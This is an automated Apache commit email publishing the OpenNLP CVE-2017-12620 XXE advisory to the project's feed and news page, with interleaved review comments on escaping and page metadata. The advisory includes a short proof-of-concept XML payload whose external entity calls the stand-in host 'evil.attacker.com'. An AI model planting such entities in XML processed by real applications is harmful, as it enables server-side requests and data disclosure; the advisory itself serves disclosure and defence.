Posted to commits@opennlp.apache.org by bu...@apache.org on 2017/10/02 09:01:52 UTC
[opennlp-site] branch asf-site updated: Automatic Site Publish by Buildbot
This is an automated email from the ASF dual-hosted git repository.
buildbot pushed a commit to branch asf-site
in repository https://gitbox.apache.org/repos/asf/opennlp-site.git
The following commit(s) were added to refs/heads/asf-site by this push:
new f109f7b Automatic Site Publish by Buildbot
f109f7b is described below
commit f109f7bc4b248c61581071bb43501b1ff9e18d35
Author: buildbot <us...@infra.apache.org>
AuthorDate: Mon Oct 2 09:01:46 2017 +0000
Automatic Site Publish by Buildbot
---
feed.xml | 76 ++++++++++++++++++-
news/{index.html => cve-2017-12620.html} | 121 ++++++++++++++++++++++++-------
news/index.html | 1 +
3 files changed, 168 insertions(+), 30 deletions(-)
diff --git a/feed.xml b/feed.xml
index 083fb13..44307d8 100644
--- a/feed.xml
+++ b/feed.xml
@@ -24,10 +24,82 @@
<atom:link href="https://opennlp.apache.org/feed.xml" rel="self" type="application/rss+xml" />
<description>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text</description>
<language>en-us</language>
- <pubDate>Sat, 16 Sep 2017 16:47:49 +0000</pubDate>
- <lastBuildDate>Sat, 16 Sep 2017 16:47:49 +0000</lastBuildDate>
+ <pubDate>Mon, 2 Oct 2017 09:01:26 +0000</pubDate>
+ <lastBuildDate>Mon, 2 Oct 2017 09:01:26 +0000</lastBuildDate>
<item>
+ <title>CVE-2017-12620 - Apache OpenNLP XXE vulnerability</title>
+ <link>https://opennlp.apache.org/news/cve-2017-12620.html</link>
+ <pubDate>Mon, 2 Oct 2017 00:00:00 +0000</pubDate>
+ <guid isPermaLink="false">news/cve-2017-12620.html</guid>
+ <description>
+ <div class="paragraph">
+<p>Severity: Medium</p>
+</div>
+<div class="paragraph">
+<p>Vendor:
+The Apache Software Foundation</p>
+</div>
+<div class="paragraph">
+<p>Versions Affected:</p>
+</div>
+<div class="ulist">
+<ul>
+<li>
+<p>OpenNLP 1.5.0 to 1.5.3</p>
+</li>
+<li>
+<p>OpenNLP 1.6.0</p>
+</li>
+<li>
+<p>OpenNLP 1.7.0 to 1.7.2</p>
+</li>
+<li>
+<p>OpenNLP 1.8.0 to 1.8.1</p>
+</li>
+</ul>
+</div>
+<div class="paragraph">
+<p>Description:
+When loading models or dictionaries that contain XML it is possible to
+perform an XXE attack, since OpenNLP is a library, this only affects
+applications that load models or dictionaries from untrusted sources.</p>
+</div>
+<div class="paragraph">
+<p>Mitigation:
+All users who load models or XML dictionaries from untrusted sources
+should update to 1.8.2.</p>
+</div>
+<div class="paragraph">
+<p>Example:</p>
+</div>
+<div class="paragraph">
+<p>An attacker can place this:</p>
+</div>
+<div class="listingblock">
+<div class="content">
+<pre class="prettyprint highlight"><code class="language-xml" data-lang="xml">&lt;?xml version="1.0" ?&gt;
+&lt;!DOCTYPE r [
+&lt;!ELEMENT r ANY &gt;
+&lt;!ENTITY sp SYSTEM "http://evil.attacker.com/"&gt;
+]&gt;
+&lt;r&gt;&amp;sp;&lt;/r&gt;</code></pre>
+</div>
+</div>
+<div class="paragraph">
+<p>Inside one of the XML files, either a dictionary or embedded inside a
+model package, to demonstrate this vulnerability.</p>
+</div>
+<div class="paragraph">
+<p>Credit:
+This issue was discovered by Nishil Shah of Salesforce.</p>
+</div>
+<div class="paragraph">
+<p>--The Apache OpenNLP Team</p>
+</div>
+ </description>
+ </item>
+ <item>
<title>Apache OpenNLP 1.8.2 released</title>
<link>https://opennlp.apache.org/news/release-182.html</link>
<pubDate>Fri, 15 Sep 2017 00:00:00 +0000</pubDate>
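Review bot: the advisory body in this feed item lists the affected versions but never states the fixed version on its own line and never links the CVE record; add a "Fixed in: 1.8.2" line after the "Versions Affected" list and link the CVE identifier in the `<title>` so feed readers can follow it to the record. The description sentence `perform an XXE attack, since OpenNLP is a library, this only affects` runs two statements together; split it as "... perform an XXE attack. Since OpenNLP is a library, this only affects ...". The escaping of the example inside `<description>` (`&lt;!ENTITY sp SYSTEM "http://evil.attacker.com/"&gt;`, `&amp;sp;`) is correct: the payload reaches readers as literal text and is not expanded by the feed's own XML parser.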
diff --git a/news/index.html b/news/cve-2017-12620.html
similarity index 75%
copy from news/index.html
copy to news/cve-2017-12620.html
index 098b205..8b2ea77 100644
--- a/news/index.html
+++ b/news/cve-2017-12620.html
@@ -2,7 +2,7 @@
<html lang="en">
<head>
<meta charset="utf-8">
- <title>News - Apache OpenNLP</title>
+ <title>CVE-2017-12620 - Apache OpenNLP XXE vulnerability - Apache OpenNLP</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Apache OpenNLP is a machine learning based toolkit for the processing of natural language text." />
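Review bot: the `<meta name="description" content="Apache OpenNLP is a machine learning based toolkit ...">` line is carried over unchanged from news/index.html, so search results and link previews will summarise the advisory page with the generic site blurb; set it to the advisory's one-line summary (the new `<title>` text "CVE-2017-12620 - Apache OpenNLP XXE vulnerability" would do) to match the updated title in the same hunk.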
@@ -170,35 +170,100 @@ body {
</nav>
<div class="container">
+ <h1 class="title">CVE-2017-12620 - Apache OpenNLP XXE vulnerability</h1>
- <div class="row-fluid marketing">
- <div class="span9">
- <h2>News</h2>
- <ul>
- <li><p>2017-09-15: <a href="/news/release-182.html">Apache OpenNLP 1.8.2 released</a></p></li>
- <li><p>2017-07-08: <a href="/news/release-181.html">Apache OpenNLP 1.8.1 released</a></p></li>
- <li><p>2017-05-19: <a href="/news/release-180.html">Apache OpenNLP 1.8.0 released</a></p></li>
- <li><p>2017-02-04: <a href="/news/release-172.html">Apache OpenNLP 1.7.2 released</a></p></li>
- <li><p>2017-01-23: <a href="/news/release-171.html">Apache OpenNLP 1.7.1 released</a></p></li>
- <li><p>2016-12-31: <a href="/news/release-170.html">Apache OpenNLP 1.7.0 released</a></p></li>
- <li><p>2015-07-13: <a href="/news/release-160.html">Apache OpenNLP 1.6.0 released</a></p></li>
- <li><p>2013-04-17: <a href="/news/release-153.html">Apache OpenNLP 1.5.3 released</a></p></li>
- <li><p>2012-02-15: <a href="/news/news-2012-02-15.html">OpenNLP graduated from the incubator as a Top Level Project</a></p></li>
- <li><p>2011-12-22: <a href="/news/news-2011-12-22.html">New members and new features…​</a></p></li>
- <li><p>2011-11-28: <a href="/news/news-2011-05-02.html">First release of 1.5.1-incubating is ready!</a></p></li>
- <li><p>2011-11-28: <a href="/news/release-152.html">Apache OpenNLP 1.5.2 Incubating released</a></p></li>
- <li><p>2011-01-29: <a href="/news/news-2011-01-29.html">Issue tracker moved to JIRA</a></p></li>
- <li><p>2010-12-24: <a href="/news/news-2010-12-24.html">Working on Apache Incubator requirements</a></p></li>
- <li><p>2010-11-23: <a href="/news/news-2010-11-23.html">OpenNLP is now into Apache Incubation!</a></p></li>
- <li><p>2010-11-18: <a href="/news/news-2010-11-18.html">OpenNLP is candidated to Apache Incubation!</a></p></li>
- </ul>
- <p></p>
- <p>Subscribe to Apache OpenNLP updates using the <a href="/feed.xml">feed</a>.</p>
- </div>
- </div>
-
- <hr>
+ <div class="paragraph">
+<p>Severity: Medium</p>
+</div>
+<div class="paragraph">
+<p>Vendor:
+The Apache Software Foundation</p>
+</div>
+<div class="paragraph">
+<p>Versions Affected:</p>
+</div>
+<div class="ulist">
+<ul>
+<li>
+<p>OpenNLP 1.5.0 to 1.5.3</p>
+</li>
+<li>
+<p>OpenNLP 1.6.0</p>
+</li>
+<li>
+<p>OpenNLP 1.7.0 to 1.7.2</p>
+</li>
+<li>
+<p>OpenNLP 1.8.0 to 1.8.1</p>
+</li>
+</ul>
+</div>
+<div class="paragraph">
+<p>Description:
+When loading models or dictionaries that contain XML it is possible to
+perform an XXE attack, since OpenNLP is a library, this only affects
+applications that load models or dictionaries from untrusted sources.</p>
+</div>
+<div class="paragraph">
+<p>Mitigation:
+All users who load models or XML dictionaries from untrusted sources
+should update to 1.8.2.</p>
+</div>
+<div class="paragraph">
+<p>Example:</p>
+</div>
+<div class="paragraph">
+<p>An attacker can place this:</p>
+</div>
+<div class="listingblock">
+<div class="content">
+<pre class="prettyprint highlight"><code class="language-xml" data-lang="xml"><?xml version="1.0" ?>
+<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY sp SYSTEM "http://evil.attacker.com/">
+]>
+<r>&sp;</r></code></pre>
+</div>
+</div>
+<div class="paragraph">
+<p>Inside one of the XML files, either a dictionary or embedded inside a
+model package, to demonstrate this vulnerability.</p>
+</div>
+<div class="paragraph">
+<p>Credit:
+This issue was discovered by Nishil Shah of Salesforce.</p>
+</div>
+<div class="paragraph">
+<p>--The Apache OpenNLP Team</p>
+</div>
+
+ <p><em>02 October 2017</em></p>
+ <div id="share"><!-- Google Plus -->
+<div class="g-plusone" data-size="medium"></div>
+<script type="text/javascript">
+ window.___gcfg = {lang: 'en-GB'};
+
+ (function() {
+ var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
+ po.src = 'https://apis.google.com/js/plusone.js';
+ var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
+ })();
+</script>
+
+<!-- Twitter -->
+<a href="https://twitter.com/share" class="twitter-share-button" data-dnt="true">Tweet</a>
+<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
+<!-- Facebook -->
+<div class="fb-like" data-send="false" data-layout="button_count" data-width="100" data-show-faces="true"></div>
+<div id="fb-root"></div>
+<script>(function(d, s, id) {
+ var js, fjs = d.getElementsByTagName(s)[0];
+ if (d.getElementById(id)) return;
+ js = d.createElement(s); js.id = id;
+ js.src = "//connect.facebook.net/en_GB/all.js#xfbml=1";
+ fjs.parentNode.insertBefore(js, fjs);
+}(document, 'script', 'facebook-jssdk'));</script></div>
</div>
<footer class='footer'>
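Review bot: the example payload is inserted into the HTML page unescaped (`<?xml version="1.0" ?>`, `<!DOCTYPE r [`, `<!ENTITY sp SYSTEM "http://evil.attacker.com/">`, `<r>&sp;</r>`), unlike the feed.xml copy of the same text which uses `&lt;`, `&gt;` and `&amp;`; inside `<pre><code>` the browser's HTML parser will swallow the XML declaration, the DOCTYPE and the ELEMENT/ENTITY declarations as bogus comments or doctype tokens and treat `<r>` as an element, so readers of the rendered page see fragments such as `]>` rather than the six-line XML. Escape the listing the same way the feed does (`&lt;?xml version="1.0" ?&gt;` ... `&lt;r&gt;&amp;sp;&lt;/r&gt;`). A secondary point: the share block pulls third-party scripts from `//platform.twitter.com/widgets.js` and `//connect.facebook.net/en_GB/all.js` via protocol-relative URLs while the Google script uses an explicit `https://`; on a security advisory page use explicit https:// for all of them, or drop the widgets.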
diff --git a/news/index.html b/news/index.html
index 098b205..71596c1 100644
--- a/news/index.html
+++ b/news/index.html
@@ -175,6 +175,7 @@ body {
<div class="span9">
<h2>News</h2>
<ul>
+ <li><p>2017-10-02: <a href="/news/cve-2017-12620.html">CVE-2017-12620 - Apache OpenNLP XXE vulnerability</a></p></li>
<li><p>2017-09-15: <a href="/news/release-182.html">Apache OpenNLP 1.8.2 released</a></p></li>
<li><p>2017-07-08: <a href="/news/release-181.html">Apache OpenNLP 1.8.1 released</a></p></li>
<li><p>2017-05-19: <a href="/news/release-180.html">Apache OpenNLP 1.8.0 released</a></p></li>